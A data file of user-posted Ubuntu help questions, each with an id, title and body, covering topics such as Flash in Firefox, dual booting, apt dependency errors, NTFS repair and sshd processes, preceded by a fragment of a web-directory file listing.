1 11:39 favicon.ico -rwxr-xr-x 1 tawfek tawfek 5979 feb 1 11:39 get.php -rwxr-xr-x 1 tawfek tawfek 2673 apr 6 22:17 index.php -rwxr-xr-x 1 tawfek tawfek 2366 feb 1 11:39 index.php.sample -rwxr-xr-x 1 tawfek tawfek 6441 feb 1 11:39 install.php -rwxr-xr-x 1 tawfek tawfek 10421 feb 1 11:39 license_afl.txt -rwxr-xr-x 1 tawfek tawfek 10679 feb 1 11:39 license.html -rwxr-xr-x 1 tawfek tawfek 10410 feb 1 11:39 license.txt -rwxr-xr-x 1 tawfek tawfek 1319 feb 1 11:39 mage -rwxr-xr-x 1 tawfek tawfek 886 feb 1 11:39 php.ini.sample -rwxr-xr-x 1 tawfek tawfek 478 feb 17 19:08 php.php -rwxr-xr-x 1 tawfek tawfek 585086 feb 1 11:39 release_notes.txt
444166	flash player alternative for firefox	i am searching for an flash player alternative for firefox yes i am using chrome and i know that it has its own flash version however i am used to firefox , and it is hard not to have videos in firefox . so what i want is to get flash running on firefox without using adobe outdated flash plugin . i asked this question on firefox support community . this is the answer i got https : //support.mozilla.org/en-us/questions/993679 i tried installing gnash and lightspark they did not work then i tried to install the 32-bit versions of this software they did not work as well . so does anyone knows how to get flash videos working in firefox ? ? thank you in advanced .
444167	ubuntu 12.04 - msi h87m-p33 mainboard sound problem	since using ubuntu instead of windows all works fine ... except the sound . sometimes , in games animations and so on are fluent but the sound laggs or when i try to record system audio with audacity ... i get no input . also , the built-in speakers of my tower are not working , i have to use external speakers . i do n't know why it doesnt work . could anyone help me ?
444169	do i need to take checkout of clang seperately while installing llvm if i already have clang	i am tring to install llvm . do i need to take checkout of clang seperately while installing llvm if i already have clang . thanks in advance .
444171	unable to dual boot in dell xps 14 with windows 8/8.1	hi can anyone help me in dual booting the windows 8/8.1 to ubuntu 12.4/13 when i am using the wubi file and i installed the ubuntu and it reboots and finally it showing me an error of 0xc000000f when i am searching for this error.i found that the drives must be in basic and i converted my drives to basicbut still i cant instal can anyone suggest me an idea to dual boot ... ... please reply with regards preky
444175	installing ubuntu on hp envy 15 ( pre installes win 8 ) is not working	i read all other posts related with this topic.but i did n't get correct answer.my laptop is hp-envy 15 j037tx.i tried to install linux os from usb after i got it.it was n't work.so i founded some ways from internet . 1.use 32 bit version of iso 2.enable legacy boot on bios 3.format usb in ntfs 4.use earlier version ( i used 12.04 ) 5.disable fast-startup in the boot device list usb showing is ok.after i select it.it takes me to the black screen with blinking white dash.not even showing installing menu or ubuntu logo.when i used ubuntu 9.10 on live cd.it took me to the menu to install or try ubuntu.as i think their is some problem with ubuntu version too.i also tried virtual box.it also worked on 32 bit for ubuntu and elementory.but not with 64 bit os.when i add x64 iso it give error , like not correct kernal found.i need to install on dual-boot mode . is their anyone can direct me to the correct way ?
444177	is using pepperflash plugin unsafe because it isnt open source ?	i 'd rather use the newest version , and ( starting from chromium 35 , i believe ) you can only use pepper flash . but i 'd rather avoid closed source software as that implies a security risk if the code is n't under public scrutiny . am i correct ?
444180	how to fix touchpad malfunction in ubuntu 13.10 ?	can anyone to fix this touchpad malfunction in asus x401u ? i look this picture , but it 's still not working in 13.10 . however if i try demo another operating system , such gnome 3.12 as example , touchpad is working properly . what and where is the problem ? or is it bug ?
444181	eclipse on ubuntu 12.04 - minimal c/c++ installation	i want to use eclipse ide for developing c/c++ applications . when i 've tried sudo apt-get install eclipsei noticed that it will install a lot of packages which seems to be unnecessary for me . which packages i should install to get eclipse ide for developing c/c++ applications ?
444182	how to remove utorrent completely	i have installed utorrent by using the steps mentioned in the link below on ubantu 12.04 ( 32 bit ) : how to install utorrent step by step ? but it 's using port 8080 and so want to remove it completely , as many other development software has default port 8080 . i have tried running sudo rm -rf /opt/utorrent-server-v3.0/ but nothing happened . the file still there in the /opt directory . i am not able to move it to trash ( option is disabled ) . please help me to understand how to handle this issue .
444187	installation problems - wine1.4 on ubuntu 13.10	the following is an attempt to capture a screen which i get regardless of how i try to install wine1.4 or wine1.7 . happens the same way every time . scroll down to the bottom of this posting and you 'll see the at the end . this gets posted after several minutes of install messages scrolling by on the terminal screen . this message fills the entire terminal screen and will not take any keyboard entry whatsoever . this is a semi-fresh 13.10 install with latest updates . several other packages were installed via software center . try to install this one , does n't work . │ │ truetype core fonts for the web eula │ │ end-user license agreement for microsoft software │ │ important-read carefully : this microsoft end-user license agreement ( `` eula '' ) is a legal agreement │ between you ( either an individual or a single entity ) and microsoft corporation for the microsoft │ software accompanying this eula , which includes computer software and may include associated │ media , printed materials , and `` on-line '' or electronic documentation ( `` software product '' or │ `` software '' ) . by exercising your rights to make and use copies of the software product , you agree │ to be bound by the terms of this eula . if you do not agree to the terms of this eula , you may not │ use the software product . │ │ software product license the software product is protected by copyright laws and international │ copyright treaties , as well as other intellectual property laws and treaties . the software │ │ < ok > │ │ └────────────────────────────────────────────────────────────────────────────────────────────────────┘
444188	how to deal with low disk space in ubuntu 13.10	i have installed ubuntu in an external drive in an ext4 partition , it is unfortunately at the end of the drive . and now i am out of disk space . but i was able to create another ext4 partition somewhere in the middle of the drive , so could someone tell me if i will be able to install applications in the second partition , maybe by making a soft link or something . edit : this was one possible solution i could think of . but if there are any other ( easier ) solutions they are welcome too .
444190	how to see the keyboard shortcut list lens using cario dock ( without unity ) ?	in unity i simply held-down super-key , is there some way i can install only this feature from the unity experience ? ( as i have since switched to cario and disabled unity ) also asked this question here : http : //stblet.blogspot.co.uk/2012/04/how-to-install-cairo-dock-300-in-ubuntu.html ? showcomment=1396813987321 # c8104558147206897682
444193	ubuntu 12.04 : path include in make/options file	i am using openfoam with qtcreator . currently i have to implement some integralfunctions with several input parameters like : code : class integralfunctionb { private : double x ; double y ; public : integralfunctionb ( double a , double b ) { x = a ; y = b ; } double operator ( ) ( double d ) const { return pow ( y,4 ) * ( 6.4/d ) *exp ( - ( 4.5*pow ( 2.0*pow ( d,3.0 ) -pow ( x,3.0 ) ,2.0 ) ) /pow ( x,2.0 ) ) ; } } ; i get the error : /home/user/solvernew/new/sourcetermintegralfunctions/integralfunctionb.h:16 : error : call of overloaded âpow ( double & , const double & ) â is ambiguous candidates are : /usr/include/i386-linux-gnu/bits/mathcalls.h:155 : double pow ( double , double ) therefore i 've added the filepath to ... ... the make/options file : -iusr/include/i386-linux-gnu/bits ... the include file of the ide ( qt creator ) : /usr/include/i386-linux-gnu/bits for the include i tried # include `` mathcalls.h '' # include < mathcalls.h > but when building my project i get the error : /home/user/solvernew/multiphaseeulerfoamnew.c:46 : error : mathcalls.h : no such file or directory please note also that in `` usr/include/i386-linux-gnu/bits '' only root has full access , others are just authorised to `` access files '' . i also changed the permissions for `` others '' in file `` mathcalls.h '' to `` read and write '' , but this did not change anything . how can i solve this problem professionally ? perhaps the problem is within my linux-ubuntu 12.04 system ?
444194	why does ps -ef list 19 occurrences of sshd ?	i have four vpss with two vendors . whereas the two vpss of the first vendor that i have been with for a number of years list between 2 and 4 sshd , when i do a ps -ef , both vpss of the second , new vendor list 19 occurrences of sshd , immediately after i do a fresh reboot . i pasted the list of sshd instances at the end of this email . is it normal that such a number of sshd instances are spawned immediately when the vps is rebooted , or is the number exorbitant ? could this be an indicator that these vpss - registered under my name - are being used for illicit purposes ( i.e . spam ? ) if the number is indeed too high , how can i reduce the number of sshd 's to the minimum required to access my vps ( conceivably no more than one or two . ) thank you . list of vpss instances follows below : root 305 1 0 apr06 ? 00:00:00 /usr/sbin/sshd -d root 1991 305 0 00:13 ? 00:00:00 sshd : root @ pts/0 root 1993 305 0 00:13 ? 00:00:00 sshd : root [ priv ] sshd 1995 1993 0 00:13 ? 00:00:00 sshd : root [ net ] root 2020 305 0 00:13 ? 00:00:00 sshd : root [ priv ] sshd 2021 2020 0 00:13 ? 00:00:00 sshd : root [ net ] root 2022 305 0 00:13 ? 00:00:00 sshd : root [ priv ] root 2023 305 0 00:13 ? 00:00:00 sshd : root [ priv ] sshd 2024 2023 0 00:13 ? 00:00:00 sshd : root [ net ] root 2025 305 0 00:13 ? 00:00:00 sshd : root [ priv ] sshd 2026 2022 0 00:13 ? 00:00:00 sshd : root [ net ] sshd 2027 2025 0 00:13 ? 00:00:00 sshd : root [ net ] root 2028 305 0 00:13 ? 00:00:00 sshd : root [ priv ] sshd 2029 2028 0 00:13 ? 00:00:00 sshd : root [ net ] root 2032 305 0 00:13 ? 00:00:00 sshd : root [ priv ] sshd 2033 2032 0 00:13 ? 00:00:00 sshd : root [ net ] root 2034 305 0 00:13 ? 00:00:00 sshd : [ accepted ] sshd 2035 2034 0 00:13 ? 00:00:00 sshd : [ net ] root 2036 305 0 00:13 ? 00:00:00 sshd : [ accepted ]
444199	ca n't connect to wi-fi	i can connect to the internet using ethernet wire , but not using wireless adapter . why is n't ubuntu recognizing the wireless network interface ?
444200	get full path of currently open files	i 'm trying to code a simple application that must read all currently open files within a certain directory . more specificly , i want to get a list of files open anywhere inside my documents folder , but i do n't want only the processes ' ids or process name , i want the full path of the open file . the thing is i have n't quite found anything to do that . i could n't do it neither in linux shell ( using ps and lsof commands ) nor using python 's psutil library . none of these is giving me the information i need , which is only the path of currently open files in a dir . any advice ? thanks in advance , p.s : i 'm tagging this as python question ( besides os related tags ) because it would be a plus if it could be done using some python library .
444202	snes9x-gtk freezing on ubuntu 13.10 while try to open roms ( solved )	i just install the snes9x-gtk from ppa on ubuntu 13.10 . but , when i try to open a rom file , the snes9x-gtk frezes and i 'm getting this message : fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 14 : reading configurations from ~/.fonts.conf is deprecated . alsa lib pcm.c:2239 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.rear alsa lib pcm.c:2239 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.center_lfe alsa lib pcm.c:2239 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.side bt_audio_service_open : connect ( ) failed : conexão recusada ( 111 ) bt_audio_service_open : connect ( ) failed : conexão recusada ( 111 ) bt_audio_service_open : connect ( ) failed : conexão recusada ( 111 ) bt_audio_service_open : connect ( ) failed : conexão recusada ( 111 ) alsa lib pcm_dmix.c:961 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream can not connect to server socket err = arquivo ou diretório não encontrado can not connect to server request channel jack server is not running or can not be started sound buffer size : 4096 ( 1024 samples ) portaudio sound driver initializing ... -- > ( alsa : default , latency 32ms ) ... ok map_lorommap have someone any ideas what could be happening ! ?
444203	facebook login problem	running ubuntu 13.10 and have facebook in online accounts . when i access this in online accounts and click on facebook , nothing happens . can an icon be placed on start page where i can log on to facebook or is there another way . thanks ...
444204	how can i fix this tearing in fullscreen video with radeon card ?	ever since i 'm on ubuntu 10.10 now 12.04 i 'm having the some trouble with any video that i play in fullscreen , the image gets a horizontal cut , like this : in ubuntu 10.10 i had a nvidea gts 250 graphic card , and now i have an onboard ati 3200hd video and i get the some results , does n't matter which player i use ( mplayer , vlc , or even a flash videos on fullscreeen get cut like this ) . i do n't know where to look , what setting change , what to install . i need help to get this fixed . it is driving me crazy right now i 'm on ubuntu 12.04 x64 and i got ubuntu 's default graphics drivers installed .
444211	how do i setup sharing files between ubuntu 13.04 ethernet connected and windows 7 wireless connected ?	having trouble setting up the ability to share files between my ubuntu 13.04 3tb hard drive desktop computer and my windows 7 laptops . could it be an issue if my laptops are connnected wireless and my ubuntu through ethernet ?
444212	can libreoffice writer read microsoft documents ?	i 'm just wondering.because i do n't know if there are some things you can do in lireoffice writer but you can not do in microsoft word.because my son does a lot of computer projects and i installed ubuntu on virtualbox so he can use it and install dropbox on it to transfer a document on to my windows 7 computer ( the computer that i used to install it ubuntu on a virtual machine ) and keep working on both machines .
444213	is xubuntu too much for intel onboard graphics ? artefacts appear then system freeze	this is my first linux install for a long time , and i 'm having some challenges with system crashes . i installed mint , which froze solid within moments of first startup , then froze several more times in the first hour of use . and , lo , it was swiftly removed . then i installed xubuntu which ran like a dream for 8 hours when little artefacts began to appear , almost like stars in the desktop-sky . they grew in number through the day , then artefacts were in the mouse pointer , purple lines flashed across the desktop . then the system froze solid . i rebooted into win xp and the graphics were completely screwed , only icons appeared , no desktop wallpaper . i shut down and left it off all night . boot in the morning to xp and everything 's fine . reboot into xubuntu , everything 's still fine . system info : dell precision 390 intel core 2 duo 2 gb ram onboard graphics res : 1280x1024 @ 60 hz now i 've read that intel onboard graphics causes some problems , but it seems to work fine , for hours , then it falls apart . i ca n't understand the problem- the computer was n't doing anything all day . screensaver was just 'blank screen ' . i 'd tested youtube etc but nothing was running . i have only installed skype , chrome , flash , and another language . if you have any thoughts i 'm all ears . my first thought is to get a basic graphics card to see if that fixes things . i anticipated transitioning to linux having a few false starts and challenges , but i 'm not ready to quit yet ... thank you in advance .
444215	tunnelbear vpn on ubuntu 12.04.3 lts	i am using ubuntu 12.04.3 lts 32-bit and wish to have the vpn program tunnelbear with the same functionality in windows . i have checked the website https : //www.tunnelbear.com/development/linux_support/ and followed the steps up to step 8 . at this step i noticed that there was no option called `` import a saved vpn configuration '' in the dropdown menu . i failed to install and maintain the vpn . i would like to have some assistance on the matter and possible suggestions for fast and gui supported vpns since i am not that familiar with the terminal side of ubuntu as of now . your help and contribution is appreciated . thanks in advance
444216	is ubuntu desktop compatible with acer aspire hardware	does anyone know if ubuntu desktop 13.10 is compatible with the acer aspire atc-605-ub11 . this system has the following specs : intel processor = i5-4440 memory = 8gb ram hard drive capacity = 1tb this system also has a specific graphics card . appreciate anyone who can answer this a.s.a.p . thanks in advance ...
444219	wrong file owner	syslog displaying the following : 04/06/14 05:16:01 pm loren-laptop cron [ 986 ] ( system ) wrong file owner ( /etc/crontab ) /etc/crontab displays : owner me is this a problem that requires fixing ?
444221	create lvm without data loss ?	i have three hard drives , one for the os and two for media . all drives are currently on ext4 partitions . one of the media drives is full , i 'd like to use an lvm to merge the two media drives into one . is it possible to create an lvm without losing any data ? - if so how ? ( i 'm very new to ubuntu )
444229	hide `` files and folders '' in `` dash home '' ?	when clicking `` dash home '' , can i hide `` files & folders '' in `` dash home '' ? how to switch between hiding and showing ? note i do n't want to hide `` applications '' . my os is 12.04 . thanks !
444230	corrupt ntfs partition 's mft â which tool is right ? what tool to fix ?	i used avira rescue disk ( ubuntu 12.04 ) to access a broken ntfs boot partition . windows 7 fails to mount it : it displays a bluescreen ( `` unmountable_boot_volume '' ) and restarts immediately . with the rescue disk i could backup the most important data ( ubuntu does not fail on mounting ) . now i tried gparted to fix the partition . gparted runs ntfsresize to analyse the partition first . a similar ( = non-writing ) but manual run of ntfsresize -info -- force /dev/sda3 gives : ntfsresize v2012.1.15ar.1 ( libntfs-3g ) device name : /dev/sda3 ntfs volume version : 3.1 cluster size : 4096 bytes current volume size : 484336226816 bytes ( 484337 mb ) current device size : 484336230400 bytes ( 484337 mb ) checking for bad sectors ... checking filesystem consistency ... 0,00 percent completed .. .. .. 12,83 percent completed ntfs_attr_pread_i : ntfs_pread failed : eingabe-/ausgabefehler failed to read of mft , mft=73604 count=1 br=-1 : eingabe-/ausgabefehler ( = i/o error ) ntfs_attr_pread_i : ntfs_pread failed : eingabe-/ausgabefehler failed to read of mft , mft=73605 count=1 br=-1 : eingabe-/ausgabefehler ntfs_attr_pread_i : ntfs_pread failed : eingabe-/ausgabefehler failed to read of mft , mft=73606 count=1 br=-1 : eingabe-/ausgabefehler ntfs_attr_pread_i : ntfs_pread failed : eingabe-/ausgabefehler failed to read of mft , mft=73607 count=1 br=-1 : eingabe-/ausgabefehler 12,85 percent completed .. .. .. 100.00 percent completed accounting clusters ... cluster accounting failed at 9962391 ( 0x980397 ) : extra cluster in $ bitmap .. .. .. cluster accounting failed at 9963113 ( 0x980669 ) : extra cluster in $ bitmap filesystem check failed ! totally 723 cluster accounting mismatches . error : ntfs is inconsistent . run chkdsk /f on windows then reboot it twice ! the usage of the /f parameter is very important ! no modification was and will be made to ntfs by this software until it gets repaired . so , $ mft seems to be broken . however , ntfsfix -- no-action /dev/sda3 ( non-writing ) states : avira @ avira : ~ $ sudo ntfsfix -n /dev/sda3 mounting volume ... ok processing of $ mft and $ mftmirr completed successfully . ntfs volume version is 3.1 . ntfs partition /dev/sda3 was processed successfully . whom can i trust ? what really happened to my $ mft ? why can ubuntu still read most of the files , and win 7 fails to mount ( expect from being windows ) ? what tool should i use to fix the mft : gparted or testdisk or ntfsfix ( without -- no-action ) or chkdsk /f ? have n't felt lucky yet . i 've read about testdisk being able to mess up $ mft and $ mftmirr in severe cases . could that happen ? additionally , smart reports one bad sector ( reallocated sectors count = 1 ) . should i renew the disk in any event ? what can i run to locate the error ( e.g . affected filenames , electromechanical failure y/n ) better ?
444233	what is the difference between mail-server^ task and the mail-stack-delivery package ?	what is the difference between the mail-server^ task and the mail-stack-delivery package ?
444238	can i deploy linux/ubuntu from a wim file ?	i would like to put linux on to a install.wim file . is it possible to deploy in this way ?
444239	installing ubuntu on acer laptop without hard drive	my acer laptop kept rebooting , not allowing me to even access the bios . so i took out the hard drive and that solved the problem.i then put ubuntu on a flash drive and proceeded to install it.i got to the screen where it says installation type.it only gives me the option of /dev/sda when i click on install now it says no root file systom is defined , and it wont let me click on the option of a new partition table , or to change or anything . i dont know if its my computer or im just doing something wrong . any help would be apreciated .
444240	ubuntu updates blocked apt-get	last week ubuntu asked to install some updates . after doing that a series of problem came out ( everything worked fine before ... ) and now i ca n't use and apt-get command because or these `` missing dependencies '' ... these problems seem to be related to man-db , openssh-server , and r-base . the only thing i know is that the new version of r that ubuntu tried to install ( via package manager ) was a beta version . i was n't expecting such automatic suggestions , anyway ... this is what i get michele @ eaaqdev01 : ~ $ sudo apt-get autoremove -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : openssh-server suggested packages : rssh molly-guard openssh-blacklist openssh-blacklist-extra monkeysphere the following packages will be removed : dpatch walinuxagent-data-saver the following packages will be upgraded : openssh-server 1 upgraded , 0 newly installed , 2 to remove and 0 not upgraded . 25 not fully installed or removed . need to get 0 b/338 kb of archives . after this operation , 280 kb disk space will be freed . do you want to continue [ y/n ] ? y debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable ( reading database ... 181945 files and directories currently installed . ) removing dpatch ... removing walinuxagent-data-saver ... setting up ca-certificates ( 20130906ubuntu0.12.04.1 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing ca-certificates ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already man-db piece : setting up man-db ( 2.6.1-2ubuntu1 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing man-db ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already openssh piece : setting up openssh-client ( 1:5.9p1-5ubuntu1.2 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing openssh-client ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of openssh-server : openssh-server depends on openssh-client ( = 1:5.9p1-5ubuntu1.1 ) ; however : version of openssh-client on system is 1:5.9p1-5ubuntu1.2 . dpkg : error processing openssh-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already r-base piece : setting up r-base-core ( 3.0.3.20140328-1precise0 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing r-base-core ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of r-cran-boot : r-cran-boot depends on r-base-core ( > = 3.0.3-1precise0 ) ; however : package r-base-core is not configured yet . dpkg : error processing r-cran-boot ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of r-cran-cluster : r-cran-cluster depends on r-base-core ( > = 3.0.3.20140328-1precise0 ) ; however : package r-base-core is not configured yet . dpkg : error processing r-cran-cluster ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of r-cran-foreign : r-cran-foreign depends on r-base-core ( > = 3.0.3-1precise0 ) ; however : package r-base-core is not configured yet . dpkg : error processing r-cran-foreign ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of r-cran-mass : r-cran-mass depends on r-base-core ( > = 3.0.3-1precise0 ) ; however : package r-base-core is not configured yet . dpkg : error processing r-cran-mass ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of r-cran-kernsmooth : r-cran-kernsmooth depends on r-base-core ( > = 3.0.3-1precise0 ) ; however : package r-base-core is not configured yet . r-cran-kernsmooth depends on r-cran-mass ; however : package r-cran-mass is not configured yet . dpkg : error processing r-cran-kernsmooth ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of r-cran-nlme : r-cran-nlme depends on r-base-core ( > = 3.0.3.20140328-1precise0 ) ; however : package r-base-core is not configured yet . dpkg : error processing r-cran-nlme ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of r-cran-matrix : r-cran-matrix depends on r-base-core ( > = 3.0.3.20140328-1precise0 ) ; however : package r-base-core is not configured yet . dpkg : error processing r-cran-matrix ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of r-cran-mgcv : r-cran-mgcv depends on r-base-core ( > = 3.0.3.20140328-1precise0 ) ; however : package r-base-core is not configured yet . r-cran-mgcv depends on r-cran-nlme ; however : package r-cran-nlme is not configured yet . r-cran-mgcv depends on r-cran-matrix ; however : package r-cran-matrix is not configured yet . dpkg : error processing r-cran-mgcv ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of r-cran-rpart : r-cran-rpart depends on r-base-core ( > = 3.0.3-1precise0 ) ; however : package r-base-core is not configured yet . dpkg : error processing r-cran-rpart ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of r-cran-class : r-cran-class depends on r-base-core ( > = 3.0.3-1precise0 ) ; however : package r-base-core is not configured yet . r-cran-class depends on r-cran-mass ; however : package r-cran-mass is not configured yet . dpkg : error processing r-cran-class ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of r-cran-nnet : r-cran-nnet depends on r-base-core ( > = 3.0.3.20140328-1precise0 ) ; however : package r-base-core is not configured yet . dpkg : error processing r-cran-nnet ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of r-recommended : r-recommended depends on r-base-core ( > = 3.0.3.20140328-1precise0 ) ; however : package r-base-core is not configured yet . r-recommended depends on r-cran-boot ( > = 1.2.19 ) ; however : package r-cran-boot is not configured yet . r-recommended depends on r-cran-cluster ( > = 1.9.6-2 ) ; however : package r-cran-cluster is not configured yet . r-recommended depends on r-cran-foreign ( > = 0.7-2 ) ; however : package r-cran-foreign is not configured yet . r-recommended depends on r-cran-kernsmooth ( > = 2.2.14 ) ; however : package r-cran-kernsmooth is not configured yet . r-recommended depends on r-cran-mgcv ( > = 1.1.5 ) ; however : package r-cran-mgcv is not configured yet . r-recommended depends on r-cran-nlme ( > = 3.1.52 ) ; however : package r-cran-nlme is not configured yet . r-recommended depends on r-cran-rpart ( > = 3.1.20 ) ; however : package r-cran-rpart is not configured yet . r-recommended depends on r-cran-mass ; however : package r-cran-mass is not configured yet . r-recommended depends on r-cran-class ; however : package r-cran-class is not configured yet . r-recommended depends on r-cran-nnet ; however : package r-cran-nnet is not configured yet . r-recommended depends on r-cran-matrix ; however : package r-cran-matrix is not configured yet . dpkg : error processing r-recommended ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of r-base : r-base depends on r-base-core ( > = 3.0.3.20140328-1precise0 ) ; however : package r-base-core is not configured yet . r-base depends on r-recommended ( = 3.0.3.20140328-1precise0 ) ; however : package r-recommended is not configured yet . dpkg : error processing r-base ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of r-base-dev : r-base-dev depends on r-base-core ( > = 3.0.3.20140328-1precise0 ) ; however : package r-base-core is not configured yet . dpkg : error processing r-base-dev ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already setting up samba-common ( 2:3.6.3-2ubuntu2.10 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing samba-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of samba-common-bin : samba-common-bin depends on samba-common ( > = 2:3.4.0~pre1-2 ) ; however : package samba-common is not configured yet . dpkg : error processing samba-common-bin ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of smbclient : smbclient depends on samba-common ( = 2:3.6.3-2ubuntu2.10 ) ; however : package samba-common is not configured yet . dpkg : error processing smbclient ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of ssh-askpass-gnome : ssh-askpass-gnome depends on openssh-client | ssh ( > = 1:1.2pre7-4 ) | ssh-krb5 ; however : package openssh-client is not configured yet . package ssh is not installed . package ssh-krb5 is not installed . dpkg : error processing ssh-askpass-gnome ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already setting up cloud-init ( 0.6.3-0ubuntu1.12 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing cloud-init ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of r-base-html : r-base-html depends on r-base-core ; however : package r-base-core is not configured yet . dpkg : error processing r-base-html ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : ca-certificates man-db openssh-client openssh-server r-base-core r-cran-boot r-cran-cluster r-cran-foreign r-cran-mass r-cran-kernsmooth r-cran-nlme r-cran-matrix r-cran-mgcv r-cran-rpart r-cran-class r-cran-nnet r-recommended r-base r-base-dev samba-common samba-common-bin smbclient ssh-askpass-gnome cloud-init r-base-html e : sub-process /usr/bin/dpkg returned an error code ( 1 ) sorry for dumping so much codes but i 'm basically stuck . any apt-get operation is blocked because of the above . it 's simply ridiculous , because i did n't ask for any for these updates , i just confirmed what ubuntu was saying `` important updates '' .
444241	making okular notes and comments visible to other pdf readers	is there a way to make okular comment and reviews for a pdf visible to adobe reader and evince ?
444244	fglrx does n't load , system using mesa	i installed fglrx from ubuntu repo , yet it does n't work , system loads with mesa anyway . ubuntu 14.04 64bit with latest updates .
444245	log history of sftp	the /var/log/auth.log does not seem to contain what commands an user used after an sftp connection . do anyone know where to find the commands issued after an sftp connection ? one of my computers was recently hacked , i could see the commands the hacker used via an ssh login , but do not know how to check the commands the hacker used after sftp in . thank you .
444246	why do n't i have a password for `` su '' ? problems with `` sudo ''	i have installed ubuntu using the gui , giving myself a password and everything . i do not intricately remember the process . however , what worries me is that i do n't know the following password : $ su password : < the only password i 've ever created on this machine > su : authentication failure i just do n't know what to do . i 'm not in trouble , but i just want to know what 's going on here . i can also lock myself out of directories : starkers @ ubuntu : ~/desktop $ mkdir foobs starkers @ ubuntu : ~/desktop $ sudo chmod 777 -r foobs sudo : /var/lib/sudo writable by non-owner ( 040777 ) , should be mode 0700 [ sudo ] password for starkers : < the only password i 've ever created on this machine > starkers @ ubuntu : ~/desktop $ cd foobs bash : cd : foobs : permission denied i 'm just a bit confused . how can i lock myself out like this ? i think sudo is the key command here . but i 'm making the foobs file as open as it can possibly be via the chmod , so why does it lock me out ?
444247	3 virtual machines running ubuntu . vm1 , vm2 , vm3 , vm2 as router , only vm1 has internet	i have 3 ubuntu virtualbox virtual machines labled vm1 , vm2 , vm3 . i would like only vm1 to have access to the internet . i would like vm2 to act as a router between vm1 and 3 . so i can ping vm3 from vm1 going through vm 2 . how should i go about this ? any help would be apreciated . thanks .
444249	lubuntu 12.04 on powerbook g4 `` wireless networks device not found ( firmware missing ) ''	i installed lubuntu 12.04 on my powerbook g4 but when i try to connect to wifi it says `` wireless networks device not found ( firmware missing ) '' how do i fix this ? i am new to lubuntu ( and terminal ) . i typed lspci -nn | grep 0280 into terminal . and got out 0001:10:12.0 network controller [ 0280 ] : broadcom corporation bcm4306 802.11b/g wireless lan controller [ 14e4:4320 ] ( rev 02 ) and the 0280 was red after typing in sudo apt-get install firmware-b43legacy-installer while attached to the ethernet , i got out reading package lists ... done building dependency tree reading state information ... done e : unable to locate package firmware-b43legacy-intaller i rebooted my computer and nothing changed
444251	graphics card error on boot	i just installed 12.04 and am receiving the low graphics card error on boot . it is asking me to reconfigure . i have a vx755 ( 1024x768 @ 60hz ) 64mb via /s3g unichrome igp ( via ) i am new to ubuntu and linux any help is appreciated
444252	ubuntu 13.10 software center pretending to install	i 'm rather new to ubuntu , but i 'm not afraid of the command line . i have a fresh install of ubuntu 13.10 , and when i tried to install chrome or skype the software centre goes through all the motions then acts like they still need to be installed . i have uninstalled and reinstalled the software centre 4 or 5 times now .
